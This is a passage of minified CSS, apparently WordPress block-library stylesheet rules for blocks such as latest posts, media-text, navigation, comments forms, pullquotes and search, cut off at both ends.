a{font-size:inherit}.wp-block-latest-posts{box-sizing:border-box}.wp-block-latest-posts.alignleft{margin-right:2em}.wp-block-latest-posts.alignright{margin-left:2em}.wp-block-latest-posts.wp-block-latest-posts__list{list-style:none}.wp-block-latest-posts.wp-block-latest-posts__list li{clear:both;overflow-wrap:break-word}.wp-block-latest-posts.is-grid{display:flex;flex-wrap:wrap}.wp-block-latest-posts.is-grid li{margin:0 1.25em 1.25em 0;width:100%}@media (min-width:600px){.wp-block-latest-posts.columns-2 li{width:calc(50% - .625em)}.wp-block-latest-posts.columns-2 li:nth-child(2n){margin-right:0}.wp-block-latest-posts.columns-3 li{width:calc(33.33333% - .83333em)}.wp-block-latest-posts.columns-3 li:nth-child(3n){margin-right:0}.wp-block-latest-posts.columns-4 li{width:calc(25% - .9375em)}.wp-block-latest-posts.columns-4 li:nth-child(4n){margin-right:0}.wp-block-latest-posts.columns-5 li{width:calc(20% - 1em)}.wp-block-latest-posts.columns-5 li:nth-child(5n){margin-right:0}.wp-block-latest-posts.columns-6 li{width:calc(16.66667% - 1.04167em)}.wp-block-latest-posts.columns-6 li:nth-child(6n){margin-right:0}}:root :where(.wp-block-latest-posts.is-grid){padding:0}:root :where(.wp-block-latest-posts.wp-block-latest-posts__list){padding-left:0}.wp-block-latest-posts__post-author,.wp-block-latest-posts__post-date{display:block;font-size:.8125em}.wp-block-latest-posts__post-excerpt,.wp-block-latest-posts__post-full-content{margin-bottom:1em;margin-top:.5em}.wp-block-latest-posts__featured-image a{display:inline-block}.wp-block-latest-posts__featured-image img{height:auto;max-width:100%;width:auto}.wp-block-latest-posts__featured-image.alignleft{float:left;margin-right:1em}.wp-block-latest-posts__featured-image.alignright{float:right;margin-left:1em}.wp-block-latest-posts__featured-image.aligncenter{margin-bottom:1em;text-align:center}ol,ul{box-sizing:border-box}:root :where(.wp-block-list.has-background){padding:1.25em 2.375em}.wp-block-loginout{box-sizing:border-box}.wp-block-math{overflow-x:auto;overflow-y:hidden}.wp-block-media-text{box-sizing:border-box; /*!rtl:begin:ignore*/direction:ltr; /*!rtl:end:ignore*/display:grid;grid-template-columns:50% 1fr;grid-template-rows:auto}.wp-block-media-text.has-media-on-the-right{grid-template-columns:1fr 50%}.wp-block-media-text.is-vertically-aligned-top>.wp-block-media-text__content,.wp-block-media-text.is-vertically-aligned-top>.wp-block-media-text__media{align-self:start}.wp-block-media-text.is-vertically-aligned-center>.wp-block-media-text__content,.wp-block-media-text.is-vertically-aligned-center>.wp-block-media-text__media,.wp-block-media-text>.wp-block-media-text__content,.wp-block-media-text>.wp-block-media-text__media{align-self:center}.wp-block-media-text.is-vertically-aligned-bottom>.wp-block-media-text__content,.wp-block-media-text.is-vertically-aligned-bottom>.wp-block-media-text__media{align-self:end}.wp-block-media-text>.wp-block-media-text__media{ /*!rtl:begin:ignore*/grid-column:1;grid-row:1; /*!rtl:end:ignore*/margin:0}.wp-block-media-text>.wp-block-media-text__content{direction:ltr; /*!rtl:begin:ignore*/grid-column:2;grid-row:1; /*!rtl:end:ignore*/padding:0 8%;word-break:break-word}.wp-block-media-text.has-media-on-the-right>.wp-block-media-text__media{ /*!rtl:begin:ignore*/grid-column:2;grid-row:1 /*!rtl:end:ignore*/}.wp-block-media-text.has-media-on-the-right>.wp-block-media-text__content{ /*!rtl:begin:ignore*/grid-column:1;grid-row:1 /*!rtl:end:ignore*/}.wp-block-media-text__media a{display:block}.wp-block-media-text__media img,.wp-block-media-text__media video{height:auto;max-width:unset;vertical-align:middle;width:100%}.wp-block-media-text.is-image-fill>.wp-block-media-text__media{background-size:cover;height:100%;min-height:250px}.wp-block-media-text.is-image-fill>.wp-block-media-text__media>a{display:block;height:100%}.wp-block-media-text.is-image-fill>.wp-block-media-text__media img{height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px;clip:rect(0,0,0,0);border:0}.wp-block-media-text.is-image-fill-element>.wp-block-media-text__media{height:100%;min-height:250px;position:relative}.wp-block-media-text.is-image-fill-element>.wp-block-media-text__media>a{display:block;height:100%}.wp-block-media-text.is-image-fill-element>.wp-block-media-text__media img{height:100%;object-fit:cover;position:absolute;width:100%}@media (max-width:600px){.wp-block-media-text.is-stacked-on-mobile{grid-template-columns:100%!important}.wp-block-media-text.is-stacked-on-mobile>.wp-block-media-text__media{grid-column:1;grid-row:1}.wp-block-media-text.is-stacked-on-mobile>.wp-block-media-text__content{grid-column:1;grid-row:2}}.wp-block-navigation{position:relative}.wp-block-navigation ul{margin-bottom:0;margin-left:0;margin-top:0;padding-left:0}.wp-block-navigation ul,.wp-block-navigation ul li{list-style:none;padding:0}.wp-block-navigation .wp-block-navigation-item{align-items:center;display:flex;position:relative}.wp-block-navigation .wp-block-navigation-item .wp-block-navigation__submenu-container:empty{display:none}.wp-block-navigation .wp-block-navigation-item__content{display:block;z-index:1}.wp-block-navigation .wp-block-navigation-item__content.wp-block-navigation-item__content{color:inherit}.wp-block-navigation.has-text-decoration-underline .wp-block-navigation-item__content,.wp-block-navigation.has-text-decoration-underline .wp-block-navigation-item__content:active,.wp-block-navigation.has-text-decoration-underline .wp-block-navigation-item__content:focus{text-decoration:underline}.wp-block-navigation.has-text-decoration-line-through .wp-block-navigation-item__content,.wp-block-navigation.has-text-decoration-line-through .wp-block-navigation-item__content:active,.wp-block-navigation.has-text-decoration-line-through .wp-block-navigation-item__content:focus{text-decoration:line-through}.wp-block-navigation :where(a),.wp-block-navigation :where(a:active),.wp-block-navigation :where(a:focus){text-decoration:none}.wp-block-navigation .wp-block-navigation__submenu-icon{align-self:center;background-color:inherit;border:none;color:currentColor;display:inline-block;font-size:inherit;height:.6em;line-height:0;margin-left:.25em;padding:0;width:.6em}.wp-block-navigation .wp-block-navigation__submenu-icon svg{display:inline-block;stroke:currentColor;height:inherit;margin-top:.075em;width:inherit}.wp-block-navigation{--navigation-layout-justification-setting:flex-start;--navigation-layout-direction:row;--navigation-layout-wrap:wrap;--navigation-layout-justify:flex-start;--navigation-layout-align:center}.wp-block-navigation.is-vertical{--navigation-layout-direction:column;--navigation-layout-justify:initial;--navigation-layout-align:flex-start}.wp-block-navigation.no-wrap{--navigation-layout-wrap:nowrap}.wp-block-navigation.items-justified-center{--navigation-layout-justification-setting:center;--navigation-layout-justify:center}.wp-block-navigation.items-justified-center.is-vertical{--navigation-layout-align:center}.wp-block-navigation.items-justified-right{--navigation-layout-justification-setting:flex-end;--navigation-layout-justify:flex-end}.wp-block-navigation.items-justified-right.is-vertical{--navigation-layout-align:flex-end}.wp-block-navigation.items-justified-space-between{--navigation-layout-justification-setting:space-between;--navigation-layout-justify:space-between}.wp-block-navigation .has-child .wp-block-navigation__submenu-container{align-items:normal;background-color:inherit;color:inherit;display:flex;flex-direction:column;opacity:0;position:absolute;z-index:2}@media not (prefers-reduced-motion){.wp-block-navigation .has-child .wp-block-navigation__submenu-container{transition:opacity .1s linear}}.wp-block-navigation .has-child .wp-block-navigation__submenu-container{height:0;overflow:hidden;visibility:hidden;width:0}.wp-block-navigation .has-child .wp-block-navigation__submenu-container>.wp-block-navigation-item>.wp-block-navigation-item__content{display:flex;flex-grow:1;padding:.5em 1em}.wp-block-navigation .has-child .wp-block-navigation__submenu-container>.wp-block-navigation-item>.wp-block-navigation-item__content .wp-block-navigation__submenu-icon{margin-left:auto;margin-right:0}.wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation-item__content{margin:0}.wp-block-navigation .has-child .wp-block-navigation__submenu-container{left:-1px;top:100%}@media (min-width:782px){.wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{left:100%;top:-1px}.wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container:before{background:#0000;content:"";display:block;height:100%;position:absolute;right:100%;width:.5em}.wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-icon{margin-right:.25em}.wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-icon svg{transform:rotate(-90deg)}}.wp-block-navigation .has-child .wp-block-navigation-submenu__toggle[aria-expanded=true]~.wp-block-navigation__submenu-container,.wp-block-navigation .has-child:not(.open-on-click):hover>.wp-block-navigation__submenu-container,.wp-block-navigation .has-child:not(.open-on-click):not(.open-on-hover-click):focus-within>.wp-block-navigation__submenu-container{height:auto;min-width:200px;opacity:1;overflow:visible;visibility:visible;width:auto}.wp-block-navigation.has-background .has-child .wp-block-navigation__submenu-container{left:0;top:100%}@media (min-width:782px){.wp-block-navigation.has-background .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{left:100%;top:0}}.wp-block-navigation-submenu{display:flex;position:relative}.wp-block-navigation-submenu .wp-block-navigation__submenu-icon svg{stroke:currentColor}button.wp-block-navigation-item__content{background-color:initial;border:none;color:currentColor;font-family:inherit;font-size:inherit;font-style:inherit;font-weight:inherit;letter-spacing:inherit;line-height:inherit;text-align:left;text-transform:inherit}.wp-block-navigation-submenu__toggle{cursor:pointer}.wp-block-navigation-submenu__toggle[aria-expanded=true]+.wp-block-navigation__submenu-icon>svg,.wp-block-navigation-submenu__toggle[aria-expanded=true]>svg{transform:rotate(180deg)}.wp-block-navigation-item.open-on-click .wp-block-navigation-submenu__toggle{padding-left:0;padding-right:.85em}.wp-block-navigation-item.open-on-click .wp-block-navigation-submenu__toggle+.wp-block-navigation__submenu-icon{margin-left:-.6em;pointer-events:none}.wp-block-navigation-item.open-on-click button.wp-block-navigation-item__content:not(.wp-block-navigation-submenu__toggle){padding:0}.wp-block-navigation .wp-block-page-list,.wp-block-navigation__container,.wp-block-navigation__responsive-close,.wp-block-navigation__responsive-container,.wp-block-navigation__responsive-container-content,.wp-block-navigation__responsive-dialog{gap:inherit}:where(.wp-block-navigation.has-background .wp-block-navigation-item a:not(.wp-element-button)),:where(.wp-block-navigation.has-background .wp-block-navigation-submenu a:not(.wp-element-button)){padding:.5em 1em}:where(.wp-block-navigation .wp-block-navigation__submenu-container .wp-block-navigation-item a:not(.wp-element-button)),:where(.wp-block-navigation .wp-block-navigation__submenu-container .wp-block-navigation-submenu a:not(.wp-element-button)),:where(.wp-block-navigation .wp-block-navigation__submenu-container .wp-block-navigation-submenu button.wp-block-navigation-item__content),:where(.wp-block-navigation .wp-block-navigation__submenu-container .wp-block-pages-list__item button.wp-block-navigation-item__content){padding:.5em 1em}.wp-block-navigation.items-justified-right .wp-block-navigation__container .has-child .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-right .wp-block-page-list>.has-child .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between .wp-block-page-list>.has-child:last-child .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between>.wp-block-navigation__container>.has-child:last-child .wp-block-navigation__submenu-container{left:auto;right:0}.wp-block-navigation.items-justified-right .wp-block-navigation__container .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-right .wp-block-page-list>.has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between .wp-block-page-list>.has-child:last-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between>.wp-block-navigation__container>.has-child:last-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{left:-1px;right:-1px}@media (min-width:782px){.wp-block-navigation.items-justified-right .wp-block-navigation__container .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-right .wp-block-page-list>.has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between .wp-block-page-list>.has-child:last-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between>.wp-block-navigation__container>.has-child:last-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{left:auto;right:100%}}.wp-block-navigation:not(.has-background) .wp-block-navigation__submenu-container{background-color:#fff;border:1px solid #00000026}.wp-block-navigation.has-background .wp-block-navigation__submenu-container{background-color:inherit}.wp-block-navigation:not(.has-text-color) .wp-block-navigation__submenu-container{color:#000}.wp-block-navigation__container{align-items:var(--navigation-layout-align,initial);display:flex;flex-direction:var(--navigation-layout-direction,initial);flex-wrap:var(--navigation-layout-wrap,wrap);justify-content:var(--navigation-layout-justify,initial);list-style:none;margin:0;padding-left:0}.wp-block-navigation__container .is-responsive{display:none}.wp-block-navigation__container:only-child,.wp-block-page-list:only-child{flex-grow:1}@keyframes overlay-menu__fade-in-animation{0%{opacity:0;transform:translateY(.5em)}to{opacity:1;transform:translateY(0)}}.wp-block-navigation__responsive-container{bottom:0;display:none;left:0;position:fixed;right:0;top:0}.wp-block-navigation__responsive-container :where(.wp-block-navigation-item a){color:inherit}.wp-block-navigation__responsive-container .wp-block-navigation__responsive-container-content{align-items:var(--navigation-layout-align,initial);display:flex;flex-direction:var(--navigation-layout-direction,initial);flex-wrap:var(--navigation-layout-wrap,wrap);justify-content:var(--navigation-layout-justify,initial)}.wp-block-navigation__responsive-container:not(.is-menu-open.is-menu-open){background-color:inherit!important;color:inherit!important}.wp-block-navigation__responsive-container.is-menu-open{background-color:inherit;display:flex;flex-direction:column}@media not (prefers-reduced-motion){.wp-block-navigation__responsive-container.is-menu-open{animation:overlay-menu__fade-in-animation .1s ease-out;animation-fill-mode:forwards}}.wp-block-navigation__responsive-container.is-menu-open{overflow:auto;padding:clamp(1rem,var(--wp--style--root--padding-top),20rem) clamp(1rem,var(--wp--style--root--padding-right),20rem) clamp(1rem,var(--wp--style--root--padding-bottom),20rem) clamp(1rem,var(--wp--style--root--padding-left),20rem);z-index:100000}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content{align-items:var(--navigation-layout-justification-setting,inherit);display:flex;flex-direction:column;flex-wrap:nowrap;overflow:visible;padding-top:calc(2rem + 24px)}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-page-list{justify-content:flex-start}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__submenu-icon{display:none}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .has-child .wp-block-navigation__submenu-container{border:none;height:auto;min-width:200px;opacity:1;overflow:initial;padding-left:2rem;padding-right:2rem;position:static;visibility:visible;width:auto}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__submenu-container{gap:inherit}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__submenu-container{padding-top:var(--wp--style--block-gap,2em)}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation-item__content{padding:0}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation-item,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-page-list{align-items:var(--navigation-layout-justification-setting,initial);display:flex;flex-direction:column}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation-item,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation-item .wp-block-navigation__submenu-container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-page-list{background:#0000!important;color:inherit!important}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__submenu-container.wp-block-navigation__submenu-container.wp-block-navigation__submenu-container.wp-block-navigation__submenu-container{left:auto;right:auto}@media (min-width:600px){.wp-block-navigation__responsive-container:not(.hidden-by-default):not(.is-menu-open){background-color:inherit;display:block;position:relative;width:100%;z-index:auto}.wp-block-navigation__responsive-container:not(.hidden-by-default):not(.is-menu-open) .wp-block-navigation__responsive-container-close{display:none}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__submenu-container.wp-block-navigation__submenu-container.wp-block-navigation__submenu-container.wp-block-navigation__submenu-container{left:0}}.wp-block-navigation:not(.has-background) .wp-block-navigation__responsive-container.is-menu-open{background-color:#fff}.wp-block-navigation:not(.has-text-color) .wp-block-navigation__responsive-container.is-menu-open{color:#000}.wp-block-navigation__toggle_button_label{font-size:1rem;font-weight:700}.wp-block-navigation__responsive-container-close,.wp-block-navigation__responsive-container-open{background:#0000;border:none;color:currentColor;cursor:pointer;margin:0;padding:0;text-transform:inherit;vertical-align:middle}.wp-block-navigation__responsive-container-close svg,.wp-block-navigation__responsive-container-open svg{fill:currentColor;display:block;height:24px;pointer-events:none;width:24px}.wp-block-navigation__responsive-container-open{display:flex}.wp-block-navigation__responsive-container-open.wp-block-navigation__responsive-container-open.wp-block-navigation__responsive-container-open{font-family:inherit;font-size:inherit;font-weight:inherit}@media (min-width:600px){.wp-block-navigation__responsive-container-open:not(.always-shown){display:none}}.wp-block-navigation__responsive-container-close{position:absolute;right:0;top:0;z-index:2}.wp-block-navigation__responsive-container-close.wp-block-navigation__responsive-container-close.wp-block-navigation__responsive-container-close{font-family:inherit;font-size:inherit;font-weight:inherit}.wp-block-navigation__responsive-close{width:100%}.has-modal-open .wp-block-navigation__responsive-close{margin-left:auto;margin-right:auto;max-width:var(--wp--style--global--wide-size,100%)}.wp-block-navigation__responsive-close:focus{outline:none}.is-menu-open .wp-block-navigation__responsive-close,.is-menu-open .wp-block-navigation__responsive-container-content,.is-menu-open .wp-block-navigation__responsive-dialog{box-sizing:border-box}.wp-block-navigation__responsive-dialog{position:relative}.has-modal-open .admin-bar .is-menu-open .wp-block-navigation__responsive-dialog{margin-top:46px}@media (min-width:782px){.has-modal-open .admin-bar .is-menu-open .wp-block-navigation__responsive-dialog{margin-top:32px}}html.has-modal-open{overflow:hidden}.wp-block-navigation .wp-block-navigation-item__label{overflow-wrap:break-word}.wp-block-navigation .wp-block-navigation-item__description{display:none}.link-ui-tools{outline:1px solid #f0f0f0;padding:8px}.link-ui-block-inserter{padding-top:8px}.link-ui-block-inserter__back{margin-left:8px;text-transform:uppercase}.wp-block-navigation .wp-block-page-list{align-items:var(--navigation-layout-align,initial);background-color:inherit;display:flex;flex-direction:var(--navigation-layout-direction,initial);flex-wrap:var(--navigation-layout-wrap,wrap);justify-content:var(--navigation-layout-justify,initial)}.wp-block-navigation .wp-block-navigation-item{background-color:inherit}.wp-block-page-list{box-sizing:border-box}.is-small-text{font-size:.875em}.is-regular-text{font-size:1em}.is-large-text{font-size:2.25em}.is-larger-text{font-size:3em}.has-drop-cap:not(:focus):first-letter{float:left;font-size:8.4em;font-style:normal;font-weight:100;line-height:.68;margin:.05em .1em 0 0;text-transform:uppercase}body.rtl .has-drop-cap:not(:focus):first-letter{float:none;margin-left:.1em}p.has-drop-cap.has-background{overflow:hidden}:root :where(p.has-background){padding:1.25em 2.375em}:where(p.has-text-color:not(.has-link-color)) a{color:inherit}p.has-text-align-left[style*="writing-mode:vertical-lr"],p.has-text-align-right[style*="writing-mode:vertical-rl"]{rotate:180deg}.wp-block-post-author{box-sizing:border-box;display:flex;flex-wrap:wrap}.wp-block-post-author__byline{font-size:.5em;margin-bottom:0;margin-top:0;width:100%}.wp-block-post-author__avatar{margin-right:1em}.wp-block-post-author__bio{font-size:.7em;margin-bottom:.7em}.wp-block-post-author__content{flex-basis:0;flex-grow:1}.wp-block-post-author__name{margin:0}.wp-block-post-author-biography{box-sizing:border-box}:where(.wp-block-post-comments-form input:not([type=submit])),:where(.wp-block-post-comments-form textarea){border:1px solid #949494;font-family:inherit;font-size:1em}:where(.wp-block-post-comments-form input:where(:not([type=submit]):not([type=checkbox]))),:where(.wp-block-post-comments-form textarea){padding:calc(.667em + 2px)}.wp-block-post-comments-form{box-sizing:border-box}.wp-block-post-comments-form[style*=font-weight] :where(.comment-reply-title){font-weight:inherit}.wp-block-post-comments-form[style*=font-family] :where(.comment-reply-title){font-family:inherit}.wp-block-post-comments-form[class*=-font-size] :where(.comment-reply-title),.wp-block-post-comments-form[style*=font-size] :where(.comment-reply-title){font-size:inherit}.wp-block-post-comments-form[style*=line-height] :where(.comment-reply-title){line-height:inherit}.wp-block-post-comments-form[style*=font-style] :where(.comment-reply-title){font-style:inherit}.wp-block-post-comments-form[style*=letter-spacing] :where(.comment-reply-title){letter-spacing:inherit}.wp-block-post-comments-form :where(input[type=submit]){box-shadow:none;cursor:pointer;display:inline-block;overflow-wrap:break-word;text-align:center}.wp-block-post-comments-form .comment-form input:not([type=submit]):not([type=checkbox]):not([type=hidden]),.wp-block-post-comments-form .comment-form textarea{box-sizing:border-box;display:block;width:100%}.wp-block-post-comments-form .comment-form-author label,.wp-block-post-comments-form .comment-form-email label,.wp-block-post-comments-form .comment-form-url label{display:block;margin-bottom:.25em}.wp-block-post-comments-form .comment-form-cookies-consent{display:flex;gap:.25em}.wp-block-post-comments-form .comment-form-cookies-consent #wp-comment-cookies-consent{margin-top:.35em}.wp-block-post-comments-form .comment-reply-title{margin-bottom:0}.wp-block-post-comments-form .comment-reply-title :where(small){font-size:var(--wp--preset--font-size--medium,smaller);margin-left:.5em}.wp-block-post-comments-count{box-sizing:border-box}.wp-block-post-content{display:flow-root}.wp-block-post-comments-link,.wp-block-post-date{box-sizing:border-box}:where(.wp-block-post-excerpt){box-sizing:border-box;margin-bottom:var(--wp--style--block-gap);margin-top:var(--wp--style--block-gap)}.wp-block-post-excerpt__excerpt{margin-bottom:0;margin-top:0}.wp-block-post-excerpt__more-text{margin-bottom:0;margin-top:var(--wp--style--block-gap)}.wp-block-post-excerpt__more-link{display:inline-block}.wp-block-post-featured-image{margin-left:0;margin-right:0}.wp-block-post-featured-image a{display:block;height:100%}.wp-block-post-featured-image :where(img){box-sizing:border-box;height:auto;max-width:100%;vertical-align:bottom;width:100%}.wp-block-post-featured-image.alignfull img,.wp-block-post-featured-image.alignwide img{width:100%}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim{background-color:#000;inset:0;position:absolute}.wp-block-post-featured-image{position:relative}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-gradient{background-color:initial}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-0{opacity:0}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-10{opacity:.1}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-20{opacity:.2}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-30{opacity:.3}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-40{opacity:.4}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-50{opacity:.5}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-60{opacity:.6}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-70{opacity:.7}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-80{opacity:.8}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-90{opacity:.9}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-100{opacity:1}.wp-block-post-featured-image:where(.alignleft,.alignright){width:100%}.wp-block-post-navigation-link .wp-block-post-navigation-link__arrow-previous{display:inline-block;margin-right:1ch}.wp-block-post-navigation-link .wp-block-post-navigation-link__arrow-previous:not(.is-arrow-chevron){transform:scaleX(1)}.wp-block-post-navigation-link .wp-block-post-navigation-link__arrow-next{display:inline-block;margin-left:1ch}.wp-block-post-navigation-link .wp-block-post-navigation-link__arrow-next:not(.is-arrow-chevron){transform:scaleX(1)}.wp-block-post-navigation-link.has-text-align-left[style*="writing-mode: vertical-lr"],.wp-block-post-navigation-link.has-text-align-right[style*="writing-mode: vertical-rl"]{rotate:180deg}.wp-block-post-terms{box-sizing:border-box}.wp-block-post-terms .wp-block-post-terms__separator{white-space:pre-wrap}.wp-block-post-time-to-read,.wp-block-post-title{box-sizing:border-box}.wp-block-post-title{word-break:break-word}.wp-block-post-title :where(a){display:inline-block;font-family:inherit;font-size:inherit;font-style:inherit;font-weight:inherit;letter-spacing:inherit;line-height:inherit;text-decoration:inherit}.wp-block-post-author-name{box-sizing:border-box}.wp-block-preformatted{box-sizing:border-box;white-space:pre-wrap}:where(.wp-block-preformatted.has-background){padding:1.25em 2.375em}.wp-block-pullquote{box-sizing:border-box;margin:0 0 1em;overflow-wrap:break-word;padding:4em 0;text-align:center}.wp-block-pullquote blockquote,.wp-block-pullquote p{color:inherit}.wp-block-pullquote blockquote{margin:0}.wp-block-pullquote p{margin-top:0}.wp-block-pullquote p:last-child{margin-bottom:0}.wp-block-pullquote.alignleft,.wp-block-pullquote.alignright{max-width:420px}.wp-block-pullquote cite,.wp-block-pullquote footer{position:relative}.wp-block-pullquote .has-text-color a{color:inherit}.wp-block-pullquote.has-text-align-left blockquote{text-align:left}.wp-block-pullquote.has-text-align-right blockquote{text-align:right}.wp-block-pullquote.has-text-align-center blockquote{text-align:center}.wp-block-pullquote.is-style-solid-color{border:none}.wp-block-pullquote.is-style-solid-color blockquote{margin-left:auto;margin-right:auto;max-width:60%}.wp-block-pullquote.is-style-solid-color blockquote p{font-size:2em;margin-bottom:0;margin-top:0}.wp-block-pullquote.is-style-solid-color blockquote cite{font-style:normal;text-transform:none}.wp-block-pullquote :where(cite){color:inherit;display:block}.wp-block-post-template{box-sizing:border-box;list-style:none;margin-bottom:0;margin-top:0;max-width:100%;padding:0}.wp-block-post-template.is-flex-container{display:flex;flex-direction:row;flex-wrap:wrap;gap:1.25em}.wp-block-post-template.is-flex-container>li{margin:0;width:100%}@media (min-width:600px){.wp-block-post-template.is-flex-container.is-flex-container.columns-2>li{width:calc(50% - .625em)}.wp-block-post-template.is-flex-container.is-flex-container.columns-3>li{width:calc(33.33333% - .83333em)}.wp-block-post-template.is-flex-container.is-flex-container.columns-4>li{width:calc(25% - .9375em)}.wp-block-post-template.is-flex-container.is-flex-container.columns-5>li{width:calc(20% - 1em)}.wp-block-post-template.is-flex-container.is-flex-container.columns-6>li{width:calc(16.66667% - 1.04167em)}}@media (max-width:600px){.wp-block-post-template-is-layout-grid.wp-block-post-template-is-layout-grid.wp-block-post-template-is-layout-grid.wp-block-post-template-is-layout-grid{grid-template-columns:1fr}}.wp-block-post-template-is-layout-constrained>li>.alignright,.wp-block-post-template-is-layout-flow>li>.alignright{float:right;margin-inline-end:0;margin-inline-start:2em}.wp-block-post-template-is-layout-constrained>li>.alignleft,.wp-block-post-template-is-layout-flow>li>.alignleft{float:left;margin-inline-end:2em;margin-inline-start:0}.wp-block-post-template-is-layout-constrained>li>.aligncenter,.wp-block-post-template-is-layout-flow>li>.aligncenter{margin-inline-end:auto;margin-inline-start:auto}.wp-block-query-pagination.is-content-justification-space-between>.wp-block-query-pagination-next:last-of-type{margin-inline-start:auto}.wp-block-query-pagination.is-content-justification-space-between>.wp-block-query-pagination-previous:first-child{margin-inline-end:auto}.wp-block-query-pagination .wp-block-query-pagination-previous-arrow{display:inline-block;margin-right:1ch}.wp-block-query-pagination .wp-block-query-pagination-previous-arrow:not(.is-arrow-chevron){transform:scaleX(1)}.wp-block-query-pagination .wp-block-query-pagination-next-arrow{display:inline-block;margin-left:1ch}.wp-block-query-pagination .wp-block-query-pagination-next-arrow:not(.is-arrow-chevron){transform:scaleX(1)}.wp-block-query-pagination.aligncenter{justify-content:center}.wp-block-query-title,.wp-block-query-total,.wp-block-quote{box-sizing:border-box}.wp-block-quote{overflow-wrap:break-word}.wp-block-quote.is-large:where(:not(.is-style-plain)),.wp-block-quote.is-style-large:where(:not(.is-style-plain)){margin-bottom:1em;padding:0 1em}.wp-block-quote.is-large:where(:not(.is-style-plain)) p,.wp-block-quote.is-style-large:where(:not(.is-style-plain)) p{font-size:1.5em;font-style:italic;line-height:1.6}.wp-block-quote.is-large:where(:not(.is-style-plain)) cite,.wp-block-quote.is-large:where(:not(.is-style-plain)) footer,.wp-block-quote.is-style-large:where(:not(.is-style-plain)) cite,.wp-block-quote.is-style-large:where(:not(.is-style-plain)) footer{font-size:1.125em;text-align:right}.wp-block-quote>cite{display:block}.wp-block-read-more{display:block;width:fit-content}.wp-block-read-more:where(:not([style*=text-decoration])){text-decoration:none}.wp-block-read-more:where(:not([style*=text-decoration])):active,.wp-block-read-more:where(:not([style*=text-decoration])):focus{text-decoration:none}ul.wp-block-rss.alignleft{margin-right:2em}ul.wp-block-rss.alignright{margin-left:2em}ul.wp-block-rss.is-grid{display:flex;flex-wrap:wrap;padding:0}ul.wp-block-rss.is-grid li{margin:0 1em 1em 0;width:100%}@media (min-width:600px){ul.wp-block-rss.columns-2 li{width:calc(50% - 1em)}ul.wp-block-rss.columns-3 li{width:calc(33.33333% - 1em)}ul.wp-block-rss.columns-4 li{width:calc(25% - 1em)}ul.wp-block-rss.columns-5 li{width:calc(20% - 1em)}ul.wp-block-rss.columns-6 li{width:calc(16.66667% - 1em)}}.wp-block-rss__item-author,.wp-block-rss__item-publish-date{display:block;font-size:.8125em}.wp-block-rss{box-sizing:border-box;list-style:none;padding:0}.wp-block-search__button{margin-left:10px;word-break:normal}.wp-block-search__button.has-icon{line-height:0}.wp-block-search__button svg{height:1.25em;min-height:24px;min-width:24px;width:1.25em;fill:currentColor;vertical-align:text-bottom}:where(.wp-block-search__button){border:1px solid #ccc;padding:6px 